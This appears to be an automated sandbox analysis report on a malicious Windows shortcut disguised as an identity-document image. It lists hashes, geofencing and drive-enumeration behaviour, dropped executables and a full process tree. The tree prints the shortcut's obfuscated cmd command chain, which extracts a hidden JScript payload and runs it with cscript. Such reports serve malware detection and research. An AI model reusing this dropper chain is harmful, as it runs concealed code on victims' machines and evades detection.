Analysis
- max time kernel: 141s
- max time network: 144s
- platform: windows10-2004_x64
- resource: win10v2004-20220310-en
- submitted: 17-03-2022 13:21
Behavioral tasks
- behavioral1: Sample CopyIdentityLicense.jpg.lnk, Resource win7-20220311-en
- behavioral2: Sample CopyIdentityLicense.jpg.lnk, Resource win10v2004-20220310-en
- behavioral3: Sample CopySwisscomstatement.pdf, Resource win7-20220311-en
- behavioral4: Sample CopySwisscomstatement.pdf, Resource win10v2004-20220310-en
General
- Target: CopyIdentityLicense.jpg.lnk
- Size: 602KB
- MD5: d1f069c6021aba84d1fa010295312315
- SHA1: 85f3f53c12a8bb7d9525b5d30ec51fdc354c1a21
- SHA256: a0ec772fd0d24ce6e5c8ffd9ec018f3b2463d6d0246d8cb9b8bbbe9230dba330
- SHA512: 710be7d2ad7f1ad2416b29b4d4b6ebd335ecdeb778b41ea2e12a3b4ef6a6df4f2e5908117b58a15e96dfde8e3bf79b7da6ba362b915ffb33e9aef904df91edf9
Malware Config
Signatures
- Executes dropped EXE (2 IoCs)
  Processes (PID, process):
    240  main.exe
    2556 RdrCER.exe
- Checks computer location settings (2 TTPs, 3 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes (description | IoC | process):
    Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | cmd.exe
    Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | cscript.exe
    Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | main.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Runs ping.exe (1 TTP, 1 IoC)
- Suspicious behavior: RenamesItself (1 IoC)
  Processes (PID, process):
    4700 cmd.exe
- Suspicious use of WriteProcessMemory (29 IoCs)
  Processes (description | PID | process | target process):
    PID 4616 wrote to memory of 364 | 4616 | cmd.exe | cmd.exe
    PID 4616 wrote to memory of 364 | 4616 | cmd.exe | cmd.exe
    PID 364 wrote to memory of 580 | 364 | cmd.exe | PING.EXE
    PID 364 wrote to memory of 580 | 364 | cmd.exe | PING.EXE
    PID 364 wrote to memory of 4464 | 364 | cmd.exe | cmd.exe
    PID 364 wrote to memory of 4464 | 364 | cmd.exe | cmd.exe
    PID 4464 wrote to memory of 4528 | 4464 | cmd.exe | fc.exe
    PID 4464 wrote to memory of 4528 | 4464 | cmd.exe | fc.exe
    PID 4464 wrote to memory of 2116 | 4464 | cmd.exe | cmd.exe
    PID 4464 wrote to memory of 2116 | 4464 | cmd.exe | cmd.exe
    PID 2116 wrote to memory of 1424 | 2116 | cmd.exe | chkdsk.exe
    PID 2116 wrote to memory of 1424 | 2116 | cmd.exe | chkdsk.exe
    PID 2116 wrote to memory of 1240 | 2116 | cmd.exe | cmd.exe
    PID 2116 wrote to memory of 1240 | 2116 | cmd.exe | cmd.exe
    PID 2116 wrote to memory of 1328 | 2116 | cmd.exe | find.exe
    PID 2116 wrote to memory of 1328 | 2116 | cmd.exe | find.exe
    PID 2116 wrote to memory of 4700 | 2116 | cmd.exe | cmd.exe
    PID 2116 wrote to memory of 4700 | 2116 | cmd.exe | cmd.exe
    PID 4700 wrote to memory of 3660 | 4700 | cmd.exe | sort.exe
    PID 4700 wrote to memory of 3660 | 4700 | cmd.exe | sort.exe
    PID 4700 wrote to memory of 928 | 4700 | cmd.exe | cmd.exe
    PID 4700 wrote to memory of 928 | 4700 | cmd.exe | cmd.exe
    PID 928 wrote to memory of 4284 | 928 | cmd.exe | cscript.exe
    PID 928 wrote to memory of 4284 | 928 | cmd.exe | cscript.exe
    PID 4284 wrote to memory of 3864 | 4284 | cscript.exe | cscript.exe
    PID 4284 wrote to memory of 3864 | 4284 | cscript.exe | cscript.exe
    PID 240 wrote to memory of 2556 | 240 | main.exe | RdrCER.exe
    PID 240 wrote to memory of 2556 | 240 | main.exe | RdrCER.exe
    PID 240 wrote to memory of 2556 | 240 | main.exe | RdrCER.exe
Processes (tree; [n] is the depth in the process tree)
- [1] C:\Windows\system32\cmd.exe (PID 4616)
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\CopyIdentityLicense.jpg.lnk
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\cmd.exe (PID 364)
    Command line: "C:\Windows\System32\cmd.exe" /c ping /? & set yc=Ve& cmd /c "echo hello& set he=cS& set lq=%cd%& flash /? & set ne=mO& ver &set eo=ip& set ua=C:\Users\Admin\AppData\Local\Temp\&fc &set gd=dat& set pv=*.z& cmd /c "set gp=//^& (for /d %i in ("%ua%%pv%%eo%") do echo ok ^& for %e in ("%i\Co*pg*") do cd %i ^& set u=1) ^& set bm=cr^& chkdsk /? ^& set pl=cO^& set ox=:J^& type "Co*pg*"^|find "VER1"^>"%ua%wct7ZD7ASHB.%gd%" ^& cmd /c " title run ^& (if not %u%==1 (%ne%%yc% /y "Co*pg* " "%ua%") else (%pl%Py /y "Co*pg* " "%ua%" )) ^& sort /? ^& cd %lq% ^& date /? ^& set zu=%he%%bm%%eo%t ^& cmd /c " %zu% "%gp%E%ox%S%bm%%eo%t" "%ua%wct7ZD7ASHB.%gd%" ^& echo dn""""
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\PING.EXE (PID 580)
      Command line: ping /?
      - Runs ping.exe
    - [3] C:\Windows\system32\cmd.exe (PID 4464)
      Command line: cmd /c "echo hello& set he=cS& set lq=C:\Users\Admin\AppData\Local\Temp& flash /? & set ne=mO& ver &set eo=ip& set ua=C:\Users\Admin\AppData\Local\Temp\&fc &set gd=dat& set pv=*.z& cmd /c "set gp=//& (for /d %i in ("%ua%%pv%%eo%") do echo ok & for %e in ("%i\Co*pg*") do cd %i & set u=1) & set bm=cr& chkdsk /? & set pl=cO& set ox=:J& type "Co*pg*"|find "VER1">"%ua%wct7ZD7ASHB.%gd%" & cmd /c " title run ^& (if not %u%==1 (%ne%%yc% /y "Co*pg* " "%ua%") else (%pl%Py /y "Co*pg* " "%ua%" )) ^& sort /? ^& cd %lq% ^& date /? ^& set zu=%he%%bm%%eo%t ^& cmd /c " %zu% "%gp%E%ox%S%bm%%eo%t" "%ua%wct7ZD7ASHB.%gd%" & echo dn""""
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\fc.exe (PID 4528)
        Command line: fc
      - [4] C:\Windows\system32\cmd.exe (PID 2116)
        Command line: cmd /c "set gp=//& (for /d %i in ("%ua%%pv%%eo%") do echo ok & for %e in ("%i\Co*pg*") do cd %i & set u=1) & set bm=cr& chkdsk /? & set pl=cO& set ox=:J& type "Co*pg*"|find "VER1">"%ua%wct7ZD7ASHB.%gd%" & cmd /c " title run & (if not %u%==1 (%ne%Ve /y "Co*pg* " "%ua%") else (%pl%Py /y "Co*pg* " "%ua%" )) & sort /? & cd %lq% & date /? & set zu=%he%%bm%%eo%t & cmd /c " %zu% "%gp%E%ox%S%bm%%eo%t" "%ua%wct7ZD7ASHB.%gd%" & echo dn"""
        - Suspicious use of WriteProcessMemory
        - [5] C:\Windows\system32\chkdsk.exe (PID 1424)
          Command line: chkdsk /?
        - [5] C:\Windows\system32\cmd.exe (PID 1240)
          Command line: C:\Windows\system32\cmd.exe /S /D /c" type "Co*pg*""
        - [5] C:\Windows\system32\find.exe (PID 1328)
          Command line: find "VER1"
        - [5] C:\Windows\system32\cmd.exe (PID 4700)
          Command line: cmd /c " title run & (if not %u%==1 (mOVe /y "Co*pg* " "C:\Users\Admin\AppData\Local\Temp\") else (%pl%Py /y "Co*pg* " "C:\Users\Admin\AppData\Local\Temp\" )) & sort /? & cd C:\Users\Admin\AppData\Local\Temp & date /? & set zu=cS%bm%ipt & cmd /c " %zu% "%gp%E%ox%S%bm%ipt" "C:\Users\Admin\AppData\Local\Temp\wct7ZD7ASHB.dat"
          - Suspicious behavior: RenamesItself
          - Suspicious use of WriteProcessMemory
          - [6] C:\Windows\system32\sort.exe (PID 3660)
            Command line: sort /?
          - [6] C:\Windows\system32\cmd.exe (PID 928)
            Command line: cmd /c " %zu% "//E:JScript" "C:\Users\Admin\AppData\Local\Temp\wct7ZD7ASHB.dat
            - Suspicious use of WriteProcessMemory
            - [7] C:\Windows\system32\cscript.exe (PID 4284)
              Command line: cScript "//E:JScript" C:\Users\Admin\AppData\Local\Temp\wct7ZD7ASHB.dat
              - Checks computer location settings
              - Suspicious use of WriteProcessMemory
              - [8] C:\Windows\System32\cscript.exe (PID 3864)
                Command line: "C:\Windows\System32\cscript.exe" "//E:JScript" "C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\Templates\wct02CJI0.dat"
- [1] C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\main.exe (PID 240)
  Command line: C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\main.exe -p"29GGZr" -sp"""NDI0MjQyNDItNDI0Mi00MjQyLTQyNDItNDI0MjQyNDI0MjQy"" ""devDISMWKI.tmp"" ""ODgyNzQ3"" ""MTAuMC4xOTA0MQ%3D%3D"" 0 ""65C36820"" ""OTM0MzE1bGN5ZmJ9dGVoclVYUF0%3D"" 0"
  - Executes dropped EXE
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - [2] C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\RdrCER.exe (PID 2556)
    Command line: "C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\RdrCER.exe" "NDI0MjQyNDItNDI0Mi00MjQyLTQyNDItNDI0MjQyNDI0MjQy" "devDISMWKI.tmp" "ODgyNzQ3" "MTAuMC4xOTA0MQ%3D%3D" 0 "65C36820" "OTM0MzE1bGN5ZmJ9dGVoclVYUF0%3D" 0
    - Executes dropped EXE
Network
MITRE ATT&CK Enterprise v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\RdrCER.exe
  MD5: e1b17e3ed49f8b4f08c9bef6e17c4a47
  SHA1: f18ba69c54664e0bc801e9de4d7096dd3b4ec3b8
  SHA256: c98769032c8f8cb984c44fabbaf81c53953df2d2d85d2c2f07c91f8b74601de5
  SHA512: e88ea017661d9bb1110b46ab69abe9ab86d031cd988b57f5eab603accbdd14ca40a3ad7abc2457583e17482c11fc93706cd2312d6247bc5cd1bf0da3b2524d0a
- C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\Templates\wct02CJI0.dat
  MD5: 59ccd44bbee1ab8e2a93f5e336938990
  SHA1: cc840273d4c785de3f43bf69d0ea1d5a166bcd44
  SHA256: a90c5cb345c78070df226f60480d61d2bef39113d74caec2b5fbae225f69235f
  SHA512: 2f586df75cbb0b76022c393101bceb8be828af88a726e36b7e3f488ac94751f6cbd0295a3e7df567efa8a1f975432ffe66b9f639cdc9b171c2990dd17a363e83
- C:\Users\Admin\AppData\Local\Microsoft\Windows\ConnectedSearches\main.exe
  MD5: f3faa3ce284dea4709353aa4fd17b11e
  SHA1: 3903fc1d299e435288f123e538f2a3912e5f5813
  SHA256: 1ddd3a76aa87e3b122da83119abc270cc3e6109f41e4a96dc7b6260162e75f31
  SHA512: fae7a385b8da1dadc66b2a296976fccc683f0fa829812237359cae9d3304eeafb1d582fe5ddcd0ba365cf85735ec577686136bd442e77b1efc792188860a918c2
- C:\Users\Admin\AppData\Local\Temp\wct7ZD7ASHB.dat
  MD5: 59ccd44bbee1ab8e2a93f5e336938990
  SHA1: cc840273d4c785de3f43bf69d0ea1d5a166bcd44
  SHA256: a90c5cb345c78070df226f60480d61d2bef39113d74caec2b5fbae225f69235f
  SHA512: 2f586df75cbb0b76022c393101bceb8be828af88a726e36b7e3f488ac94751f6cbd0295a3e7df567efa8a1f975432ffe66b9f639cdc9b171c2990dd17a363e83